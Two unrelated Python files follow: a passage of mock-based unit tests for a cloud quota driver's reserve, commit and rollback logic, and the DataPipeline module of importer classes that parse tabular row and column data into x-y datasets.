self.mock_quota_result.all = Mock(return_value=[])
quotas = self.driver.get_all_quotas_by_tenant(FAKE_TENANT1,
resources.keys())
self.assertEqual(FAKE_TENANT1, quotas[Resource.INSTANCES].tenant_id)
self.assertEqual(Resource.INSTANCES,
quotas[Resource.INSTANCES].resource)
self.assertEqual(CONF.max_instances_per_tenant,
quotas[Resource.INSTANCES].hard_limit)
self.assertEqual(FAKE_TENANT1, quotas[Resource.VOLUMES].tenant_id)
self.assertEqual(Resource.VOLUMES, quotas[Resource.VOLUMES].resource)
self.assertEqual(CONF.max_volumes_per_tenant,
quotas[Resource.VOLUMES].hard_limit)
def test_get_all_quotas_by_tenant_with_one_default(self):
FAKE_QUOTAS = [Quota(tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
hard_limit=22)]
self.mock_quota_result.all = Mock(return_value=FAKE_QUOTAS)
quotas = self.driver.get_all_quotas_by_tenant(FAKE_TENANT1,
resources.keys())
self.assertEqual(FAKE_TENANT1, quotas[Resource.INSTANCES].tenant_id)
self.assertEqual(Resource.INSTANCES,
quotas[Resource.INSTANCES].resource)
self.assertEqual(22, quotas[Resource.INSTANCES].hard_limit)
self.assertEqual(FAKE_TENANT1, quotas[Resource.VOLUMES].tenant_id)
self.assertEqual(Resource.VOLUMES, quotas[Resource.VOLUMES].resource)
self.assertEqual(CONF.max_volumes_per_tenant,
quotas[Resource.VOLUMES].hard_limit)
def test_get_quota_usage_by_tenant(self):
FAKE_QUOTAS = [QuotaUsage(tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=3,
reserved=1)]
self.mock_usage_result.all = Mock(return_value=FAKE_QUOTAS)
usage = self.driver.get_quota_usage_by_tenant(FAKE_TENANT1,
Resource.VOLUMES)
self.assertEqual(FAKE_TENANT1, usage.tenant_id)
self.assertEqual(Resource.VOLUMES, usage.resource)
self.assertEqual(3, usage.in_use)
self.assertEqual(1, usage.reserved)
def test_get_quota_usage_by_tenant_default(self):
FAKE_QUOTA = QuotaUsage(tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=0,
reserved=0)
self.mock_usage_result.all = Mock(return_value=[])
QuotaUsage.create = Mock(return_value=FAKE_QUOTA)
usage = self.driver.get_quota_usage_by_tenant(FAKE_TENANT1,
Resource.VOLUMES)
self.assertEqual(FAKE_TENANT1, usage.tenant_id)
self.assertEqual(Resource.VOLUMES, usage.resource)
self.assertEqual(0, usage.in_use)
self.assertEqual(0, usage.reserved)
def test_get_all_quota_usages_by_tenant(self):
FAKE_QUOTAS = [QuotaUsage(tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=2,
reserved=1),
QuotaUsage(tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=1,
reserved=1)]
self.mock_usage_result.all = Mock(return_value=FAKE_QUOTAS)
usages = self.driver.get_all_quota_usages_by_tenant(FAKE_TENANT1,
resources.keys())
self.assertEqual(FAKE_TENANT1, usages[Resource.INSTANCES].tenant_id)
self.assertEqual(Resource.INSTANCES,
usages[Resource.INSTANCES].resource)
self.assertEqual(2, usages[Resource.INSTANCES].in_use)
self.assertEqual(1, usages[Resource.INSTANCES].reserved)
self.assertEqual(FAKE_TENANT1, usages[Resource.VOLUMES].tenant_id)
self.assertEqual(Resource.VOLUMES, usages[Resource.VOLUMES].resource)
self.assertEqual(1, usages[Resource.VOLUMES].in_use)
self.assertEqual(1, usages[Resource.VOLUMES].reserved)
def test_get_all_quota_usages_by_tenant_with_all_default(self):
FAKE_QUOTAS = [QuotaUsage(tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=0,
reserved=0),
QuotaUsage(tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=0,
reserved=0)]
def side_effect_func(*args, **kwargs):
return (FAKE_QUOTAS[0] if kwargs['resource'] == 'instances'
else FAKE_QUOTAS[1])
self.mock_usage_result.all = Mock(return_value=[])
QuotaUsage.create = Mock(side_effect=side_effect_func)
usages = self.driver.get_all_quota_usages_by_tenant(FAKE_TENANT1,
resources.keys())
self.assertEqual(FAKE_TENANT1, usages[Resource.INSTANCES].tenant_id)
self.assertEqual(Resource.INSTANCES,
usages[Resource.INSTANCES].resource)
self.assertEqual(0, usages[Resource.INSTANCES].in_use)
self.assertEqual(0, usages[Resource.INSTANCES].reserved)
self.assertEqual(FAKE_TENANT1, usages[Resource.VOLUMES].tenant_id)
self.assertEqual(Resource.VOLUMES, usages[Resource.VOLUMES].resource)
self.assertEqual(0, usages[Resource.VOLUMES].in_use)
self.assertEqual(0, usages[Resource.VOLUMES].reserved)
def test_get_all_quota_usages_by_tenant_with_one_default(self):
FAKE_QUOTAS = [QuotaUsage(tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=0,
reserved=0)]
NEW_FAKE_QUOTA = QuotaUsage(tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=0,
reserved=0)
self.mock_usage_result.all = Mock(return_value=FAKE_QUOTAS)
QuotaUsage.create = Mock(return_value=NEW_FAKE_QUOTA)
usages = self.driver.get_all_quota_usages_by_tenant(FAKE_TENANT1,
resources.keys())
self.assertEqual(FAKE_TENANT1, usages[Resource.INSTANCES].tenant_id)
self.assertEqual(Resource.INSTANCES,
usages[Resource.INSTANCES].resource)
self.assertEqual(0, usages[Resource.INSTANCES].in_use)
self.assertEqual(0, usages[Resource.INSTANCES].reserved)
self.assertEqual(FAKE_TENANT1, usages[Resource.VOLUMES].tenant_id)
self.assertEqual(Resource.VOLUMES, usages[Resource.VOLUMES].resource)
self.assertEqual(0, usages[Resource.VOLUMES].in_use)
self.assertEqual(0, usages[Resource.VOLUMES].reserved)
def test_check_quota_with_unlimited_quota(self):
FAKE_QUOTA_USAGE = [QuotaUsage(id=1,
tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=1,
reserved=2),
QuotaUsage(id=2,
tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=1,
reserved=1)]
FAKE_QUOTAS = [Quota(tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
hard_limit=-1),
Quota(tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
hard_limit=-1)]
self.mock_quota_result.all = Mock(return_value=FAKE_QUOTAS)
self.mock_usage_result.all = Mock(return_value=FAKE_QUOTA_USAGE)
QuotaUsage.save = Mock()
Reservation.create = Mock()
delta = {'instances': 2, 'volumes': 3}
self.assertIsNone(self.driver.check_quotas(FAKE_TENANT1, resources,
delta))
def test_reserve(self):
FAKE_QUOTAS = [QuotaUsage(id=1,
tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=1,
reserved=2),
QuotaUsage(id=2,
tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=1,
reserved=1)]
self.mock_quota_result.all = Mock(return_value=[])
self.mock_usage_result.all = Mock(return_value=FAKE_QUOTAS)
QuotaUsage.save = Mock()
Reservation.create = Mock()
# Set up the deltas with the intention that after the reserve call
# the deltas should match usage_id + 1 for both instances and volumes
delta = {'instances': 2, 'volumes': 3}
self.driver.reserve(FAKE_TENANT1, resources, delta)
for _, kw in Reservation.create.call_args_list:
self.assertEqual(kw['usage_id'] + 1, kw['delta'])
self.assertEqual(Reservation.Statuses.RESERVED, kw['status'])
def test_reserve_resource_unknown(self):
delta = {'instances': 10, 'volumes': 2000, 'Fake_resource': 123}
self.assertRaises(exception.QuotaResourceUnknown,
self.driver.reserve,
FAKE_TENANT1,
resources,
delta)
def test_reserve_over_quota(self):
FAKE_QUOTAS = [QuotaUsage(id=1,
tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=0,
reserved=0),
QuotaUsage(id=2,
tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=0,
reserved=0)]
self.mock_quota_result.all = Mock(return_value=[])
self.mock_usage_result.all = Mock(return_value=FAKE_QUOTAS)
delta = {'instances': 1, 'volumes': CONF.max_volumes_per_tenant + 1}
self.assertRaises(exception.QuotaExceeded,
self.driver.reserve,
FAKE_TENANT1,
resources,
delta)
def test_reserve_over_quota_with_usage(self):
FAKE_QUOTAS = [QuotaUsage(id=1,
tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=1,
reserved=0),
QuotaUsage(id=2,
tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=0,
reserved=0)]
self.mock_quota_result.all = Mock(return_value=[])
self.mock_usage_result.all = Mock(return_value=FAKE_QUOTAS)
max_inst = CONF.max_instances_per_tenant
delta = {'instances': max_inst, 'volumes': 3}
self.assertRaises(exception.QuotaExceeded,
self.driver.reserve,
FAKE_TENANT1,
resources,
delta)
def test_reserve_over_quota_with_reserved(self):
FAKE_QUOTAS = [QuotaUsage(id=1,
tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=1,
reserved=2),
QuotaUsage(id=2,
tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=0,
reserved=0)]
self.mock_quota_result.all = Mock(return_value=[])
self.mock_usage_result.all = Mock(return_value=FAKE_QUOTAS)
max_inst = CONF.max_instances_per_tenant
delta = {'instances': max_inst - 1, 'volumes': 2}
self.assertRaises(exception.QuotaExceeded,
self.driver.reserve,
FAKE_TENANT1,
resources,
delta)
def test_reserve_over_quota_but_can_apply_negative_deltas(self):
FAKE_QUOTAS = [QuotaUsage(id=1,
tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=10,
reserved=0),
QuotaUsage(id=2,
tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=50,
reserved=0)]
self.mock_quota_result.all = Mock(return_value=[])
self.mock_usage_result.all = Mock(return_value=FAKE_QUOTAS)
QuotaUsage.save = Mock()
Reservation.create = Mock()
# Set up the deltas with the intention that after the reserve call
# the deltas should match -usage_id for both instances and volumes
delta = {'instances': -1, 'volumes': -2}
self.driver.reserve(FAKE_TENANT1, resources, delta)
for _, kw in Reservation.create.call_args_list:
self.assertEqual(-kw['usage_id'], kw['delta'])
self.assertEqual(Reservation.Statuses.RESERVED, kw['status'])
def test_commit(self):
Reservation.save = Mock()
QuotaUsage.save = Mock()
FAKE_QUOTAS = [QuotaUsage(id=1,
tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=5,
reserved=2),
QuotaUsage(id=2,
tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=1,
reserved=2)]
FAKE_RESERVATIONS = [Reservation(usage_id=1,
delta=1,
status=Reservation.Statuses.RESERVED),
Reservation(usage_id=2,
delta=2,
status=Reservation.Statuses.RESERVED)]
QuotaUsage.find_by = Mock(side_effect=FAKE_QUOTAS)
self.driver.commit(FAKE_RESERVATIONS)
self.assertEqual(6, FAKE_QUOTAS[0].in_use)
self.assertEqual(1, FAKE_QUOTAS[0].reserved)
self.assertEqual(Reservation.Statuses.COMMITTED,
FAKE_RESERVATIONS[0].status)
self.assertEqual(3, FAKE_QUOTAS[1].in_use)
self.assertEqual(0, FAKE_QUOTAS[1].reserved)
self.assertEqual(Reservation.Statuses.COMMITTED,
FAKE_RESERVATIONS[1].status)
def test_commit_cannot_be_less_than_zero(self):
Reservation.save = Mock()
QuotaUsage.save = Mock()
FAKE_QUOTAS = [QuotaUsage(id=1,
tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=0,
reserved=-1)]
FAKE_RESERVATIONS = [Reservation(usage_id=1,
delta=-1,
status=Reservation.Statuses.RESERVED)]
QuotaUsage.find_by = Mock(side_effect=FAKE_QUOTAS)
self.driver.commit(FAKE_RESERVATIONS)
self.assertEqual(0, FAKE_QUOTAS[0].in_use)
self.assertEqual(0, FAKE_QUOTAS[0].reserved)
self.assertEqual(Reservation.Statuses.COMMITTED,
FAKE_RESERVATIONS[0].status)
def test_rollback(self):
Reservation.save = Mock()
QuotaUsage.save = Mock()
FAKE_QUOTAS = [QuotaUsage(id=1,
tenant_id=FAKE_TENANT1,
resource=Resource.INSTANCES,
in_use=5,
reserved=2),
QuotaUsage(id=2,
tenant_id=FAKE_TENANT1,
resource=Resource.VOLUMES,
in_use=1,
reserved=2)]
FAKE_RESERVATIONS = [Reservation(usage_id=1,
delta=1,
status=Reservation.Statuses.RESERVED),
Reservation(usage_id=2,
delta=2,
status=Reservation.Statuses.RESERVED)]
QuotaUsage.find_by = Mock(side_effect=FAKE_QUOTAS)
self.driver.rollback(FAKE_RESERVATIONS)
self.assertEqual(5, FAKE_QUOTAS[0].in_use)
self.assertEqual(1, FAKE_QUOTAS[0].reserved)
self.assertEqual(Reservation.Statuses.ROLLEDBACK,
FAKE_RESERVATIONS[0].status)
self.assertEqual(1, FAKE_QUOTAS[1].in_use)
self.assertEqual(0, FAKE_QUOTAS[1].reserved)
self.assertEqual(Reservation.Statuses.ROLLEDBACK,
FAKE_RESERVATIONS[1].status)
|
|
#!/usr/bin/env python
#
# DataPipeline - A data import and fitting tool
# Copyright (C) 2011 Damien Farrell
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Contact information:
# Email: damien.farrell_at_ucd.ie
# Normal mail:
# Damien Farrell
# SBBS, Conway Institute
# University College Dublin
# Dublin 4, Ireland
#
import string, time, datetime
import Base, Utilities
class BaseImporter(object):
"""Base Importer class, sub-class this to define methods specific to each kind of
import format. At minimum we override the doImport method to get specific
format functionality. This class should not be instantiated directly."""
name = 'base'
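    # A minimal subclass, sketched here for illustration (MyImporter and its
    # return values are hypothetical), overrides doImport and returns a dict
    # mapping dataset names to [x, y] value lists:
    #
    #   class MyImporter(BaseImporter):
    #       name = 'myformat'
    #       def doImport(self, lines):
    #           return {'series1': [[0.0, 1.0], [2.0, 3.0]]}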
def __init__(self, cp):
"""Arguments:
cp - a ConfigParser object that has been loaded in the parent app"""
Utilities.setAttributesfromConfigParser(self, cp)
if self.delimeter=='': self.delimeter=' '
elif self.delimeter=='tab': self.delimeter='\t'
return
def guessRowStart(self, lines):
"""If rowstart is not specified in config, it might be non-zero"""
s = 0
for line in lines:
if not self.checkEmptyRow(line):
s+=1
else:
self.rowstart = s
return
def checkEmptyRow(self, line):
if line.startswith('#') or line=='' or line.startswith('\r'):
return False
return True
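    # Note: despite its name, checkEmptyRow returns True for rows that
    # contain data and False for blank or comment rows.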
def getRow(self, lines, row, start=None, grouped=False):
"""Return values in a row"""
#if we have repeating cols we return multiple lists
if self.ignorecomments==True and lines[row].startswith('#'):
return None
if not self.checkEmptyRow(lines[row]):
return None
if start == None:
start = self.colstart
vals = string.strip(lines[row]).split(self.delimeter)
vals = vals[start:]
if grouped == False:
return vals
else:
if self.colrepeat == 0:
return [vals]
elif self.colrepeat > 1:
return self.groupList(self.colrepeat, vals)
else:
return None
def getColumn(self, lines, col, grouped=False):
"""Return values in a column"""
vals = []
for row in range(self.rowstart, self.rowend):
if self.ignorecomments==True and lines[row].startswith('#'):
continue
rowdata = string.strip(lines[row]).split(self.delimeter)
if len(rowdata) < col+1:
continue
vals.append(rowdata[col])
if grouped == False:
return vals
else:
if self.rowrepeat == 0:
return [vals]
elif self.rowrepeat > 1:
return self.groupList(self.rowrepeat, vals)
def getColumnHeader(self, lines, grouped=False):
"""Column headers are taken from relevant row"""
if self.colheaderlabels != '':
#if a column header provided in conf file
#pad with xdata col and return it
#print self.colheaderlabels
colheader = list(self.colheaderlabels.split(','))
colheader.insert(0,'x')
return colheader
if self.colheader == '':
row = self.rowstart
else:
row = self.colheader
if self.colheaderstart != '':
start = self.colheaderstart
else:
start = self.colstart
return self.getRow(lines, row, start=start, grouped=grouped)
def getRowHeader(self, lines, grouped=False):
"""Return values in header row"""
if self.colheader == '':
col = self.colstart
else:
col = 0
return self.getColumn(lines, col, grouped)
def groupList(self, n, l, padvalue=None):
"""group a list into chunks of n size"""
return [l[i:i+n] for i in range(0, len(l), n)]
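    # For example, groupList(2, ['a', 'b', 'c', 'd', 'e']) returns
    # [['a', 'b'], ['c', 'd'], ['e']]; the final chunk may be shorter than n
    # and the padvalue argument is currently unused.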
def getXYValues(self, xd, yd, start=0, xformat='', yformat=''):
"""Return a lists of floats from lists of vals whilst doing
various checks to remove errors etc."""
x=[]; y=[]
for i in range(start,len(xd)):
if i>=len(yd): break
xval = self.checkValue(xd[i], xformat)
yval = self.checkValue(yd[i], yformat)
if xval==None or yval==None:
continue
x.append(xval)
y.append(yval)
if len(x)<=1:
return None, None
return x,y
def checkValue(self, val, format=''):
"""Coerce a string to float if possible"""
#add code to handle commas in thousand separators
dec = self.decimalsymbol
if format != '':
return self.checkTime(val, format)
if dec == '.':
try:
return float(val)
except:
return None
else:
try:
return float(val.replace(".","").replace(dec,"."))
except ValueError, e:
#print e
return None
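    # For example, with decimalsymbol set to ',' a value such as '1.234,56'
    # becomes 1234.56 (thousands separator stripped, comma treated as the
    # decimal point); with the default '.' the value is passed straight to
    # float(), and anything unparsable yields None.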
def checkTime(self, val, timeformat):
"""Coerce to a datetime object and return a value in seconds
from some reference"""
try:
dt = datetime.datetime.strptime(val,timeformat)
return dt
except ValueError, e:
print e
return None
def convertTimeValues(self, vals):
"""Convert datetime values to decimal"""
if vals == None or len(vals)<1:
return None
result=[]
ref = vals[0]
for v in vals:
delta = v-ref
result.append(delta.seconds)
return result
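    # For example, values parsed one minute apart become [0, 60, 120, ...]
    # relative to the first timestamp; note that timedelta.seconds ignores
    # whole days, so spans longer than 24 hours lose that part of the offset.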
def checkUnicode(self, s):
"""Check for unicode string"""
try:
s.decode('ascii')
except UnicodeDecodeError:
s = unicode(s)
return s
def doImport(self, lines):
"""Should be overrriden"""
return
class DatabyColImporter(BaseImporter):
"""This importer handles data formatted in columns with common x values
in a specified column, it also handles multiple sets of data grouped
in evenly spaced distances down each column"""
name = 'databycolumn'
def __init__(self, cp):
BaseImporter.__init__(self, cp)
return
def doImport(self, lines):
data = {}
if self.rowend == 0:
self.rowend=len(lines)
xdata = self.getRowHeader(lines,grouped=True)
#print xdata
header = self.getColumnHeader(lines)
if self.colend == 0:
self.colend = len(header)
if xdata == None:
return
#print header
for col in range(self.colstart+1, self.colend):
#print col, header
coldata = self.getColumn(lines, col, grouped=True)
#print xdata, coldata
if coldata == None: continue
for xd,yd in zip(xdata,coldata):
if len(xd)<=1 or len(yd)<=1: continue
if self.colheaderlabels == '':
name = yd[0]
else:
name = header[col]
x,y = self.getXYValues(xd,yd)
data[name] = [x,y]
return data
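# A rough sketch of the layout DatabyColImporter is aimed at, assuming
# whitespace-delimited text with the x values in the first column and one
# dataset per following column (the labels shown are hypothetical):
#
#   x  sampleA  sampleB
#   0  1.2      3.4
#   1  1.5      3.1
#
# With a suitable config, doImport() returns a dict of the form
# {'sampleA': [[0.0, 1.0], [1.2, 1.5]], 'sampleB': [[0.0, 1.0], [3.4, 3.1]]}.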
class DatabyRowImporter(BaseImporter):
"""This importer handles data formatted in rows with common x values
along the top (or specified in a specific row), it also handles
multiple sets of data grouped in evenly spaced distances along the row"""
name = 'databyrow'
def __init__(self, cp):
BaseImporter.__init__(self, cp)
return
def doImport(self, lines):
data = {}
self.guessRowStart(lines)
xdata = self.getColumnHeader(lines,grouped=True)
if xdata == None:
return
if self.rowend == 0:
self.rowend=len(lines)
for row in range(self.rowstart+1, self.rowend):
if row>=len(lines):
break
rowdata = self.getRow(lines,row,grouped=True)
#print xdata, rowdata
if rowdata == None: continue
for xd,yd in zip(xdata,rowdata):
#print xd, yd
if len(xd)<=1 or len(yd)<=1: continue
name = yd[0]
x,y = self.getXYValues(xd[1:],yd[1:])
data[name] = [x,y]
return data
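# The row-oriented equivalent expected by DatabyRowImporter transposes the
# sketch above: common x values run along the header row and each subsequent
# row holds one dataset with its label in the first cell, e.g.
#
#   x        0    1    2
#   sampleA  1.2  1.5  1.7
#   sampleB  3.4  3.1  2.9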
class PairedDatabyColImporter(BaseImporter):
"""This importer handles data formatted in rows with paired x-y values,
there are therefore no common x-values in the header """
name = 'paireddatabycolumn'
def __init__(self, cp):
BaseImporter.__init__(self, cp)
return
def doImport(self, lines):
data = {}
if self.rowend == 0:
self.rowend=len(lines)
header = self.getColumnHeader(lines)
if self.colend == 0:
self.colend = len(header)+1
i=0
for col in range(self.colstart, self.colend):
coldata = self.getColumn(lines, col, grouped=True)
name = header[i]
for xyd in coldata:
x = xyd[1:len(xyd):2]
y = xyd[2:len(xyd):2]
data[name] = [x,y]
i+=1
return data
class PairedDatabyDoubleColImporter(BaseImporter):
    """This importer handles data where each dataset occupies two adjacent
    columns, the first holding the x values and the second the y values"""
    name = 'paireddatabydoublecolumn'
def __init__(self, cp):
BaseImporter.__init__(self, cp)
return
def doImport(self, lines):
data = {}
if self.rowend == 0:
self.rowend=len(lines)
header = self.getColumnHeader(lines)
if self.colend == 0:
self.colend = len(header)
i=0
for col in range(self.colstart, self.colend, 2):
x = self.getColumn(lines, col, grouped=True)[0]
y = self.getColumn(lines, col+1, grouped=True)[0]
name = header[i]
data[name] = [x,y]
i+=2
return data
class PairedDatabyRowImporter(BaseImporter):
"""This importer handles data formatted in rows with paired x-y values,
there are therefore no common x-values in the header """
name = 'paireddatabyrow'
def __init__(self, cp):
BaseImporter.__init__(self, cp)
return
def doImport(self, lines):
data = {}
if self.rowend == 0:
self.rowend=len(lines)
for row in range(self.rowstart+1, self.rowend):
if row>=len(lines):
break
rowdata = self.getRow(lines,row, grouped=True)
for xyd in rowdata:
name = xyd[0]
x = xyd[1:len(xyd):2]
y = xyd[2:len(xyd):2]
data[name] = [x,y]
return data
class PairedDatabyDoubleRowImporter(BaseImporter):
"""This importer handles data formatted in rows with paired x-y values,
there are therefore no common x-values in the header """
name = 'paireddatabydoublerow'
def __init__(self, cp):
BaseImporter.__init__(self, cp)
return
def doImport(self, lines):
data = {}
if self.rowend == 0:
self.rowend=len(lines)
header = self.getRowHeader(lines)
i=0
for row in range(self.rowstart, self.rowend, 2):
if row>=len(lines):
break
x = self.getRow(lines,row, grouped=True)[0]
y = self.getRow(lines,row+1, grouped=True)[0]
name = header[i]
data[name] = [x,y]
i+=2
return data
class GroupedDatabyRowImporter(BaseImporter):
"""This importer handles data formatted in rows with multiple independent x values in
each column, each dataset is then repeated in groups every x rows, specified in
the rowrepeat option. The importer therefore returns dictionary with multiple sets of
x-y values for each label/dataset"""
name = 'groupeddatabyrow'
def __init__(self, cp):
BaseImporter.__init__(self, cp)
return
def doImport(self, lines):
data = {}
#assumes the column header has labels for each set of xy vals
labels = self.getColumnHeader(lines)
        #print labels
if self.rowend == 0:
self.rowend=len(lines)
if self.colend == 0:
self.colend = len(labels)
step = self.rowrepeat
for d in range(1, self.rowrepeat):
for row in range(self.rowstart, self.rowend, step):
if row>=len(lines):
break
xdata = self.getRow(lines, row)
rowdata = self.getRow(lines, row+d)
name = rowdata[0]
if not data.has_key(name):
data[name] = {}
for v in zip(labels,xdata,rowdata)[1:]:
label = v[0]
x = self.checkValue(v[1])
y = self.checkValue(v[2])
if x==None or y==None:
continue
if not data[name].has_key(label):
data[name][label]=[]
l = data[name][label]
l.append((x,y))
#reformat paired vals into x and y lists
for d in data:
for lbl in data[d]:
data[d][lbl] = zip(*data[d][lbl])
return data
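# Unlike the flat {name: [x, y]} dicts above, the grouped importers return a
# nested mapping, roughly {dataset: {label: [(x1, x2, ...), (y1, y2, ...)]}},
# because zip(*pairs) regroups the collected (x, y) tuples at the end.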
class GroupedDatabyColImporter(BaseImporter):
"""This importer handles data formatted in cols with multiple independent x values in
each row, each dataset is then repeated in groups every x columns, specified in
the colrepeat option. The importer therefore returns dictionary with multiple sets of
x-y values for each label/dataset"""
name = 'groupeddatabycolumn'
def __init__(self, cp):
BaseImporter.__init__(self, cp)
return
def doImport(self, lines):
data = {}
#assumes the row header has labels for each set of xy vals
if self.rowend == 0:
self.rowend=len(lines)
labels = self.getRowHeader(lines)
header = self.getColumnHeader(lines)
if self.colend == 0:
self.colend = len(header)
grouplen = len(self.getColumnHeader(lines, grouped=True)[0])
step = self.colrepeat
for d in range(1,grouplen):
for col in range(self.colstart, self.colend, step):
xdata = self.getColumn(lines, col)
coldata = self.getColumn(lines, col+d)
name = coldata[0]
if not data.has_key(name):
data[name] = {}
#print name, xdata,coldata
for v in zip(labels,xdata,coldata)[1:]:
label = v[0]
x = self.checkValue(v[1])
y = self.checkValue(v[2])
if x==None or y==None:
continue
if not data[name].has_key(label):
data[name][label]=[]
l = data[name][label]
l.append((x,y))
#reformat paired vals into x and y lists
#by convention we put secondary labels into nested dicts
for d in data:
for lbl in data[d]:
data[d][lbl] = zip(*data[d][lbl])
return data
|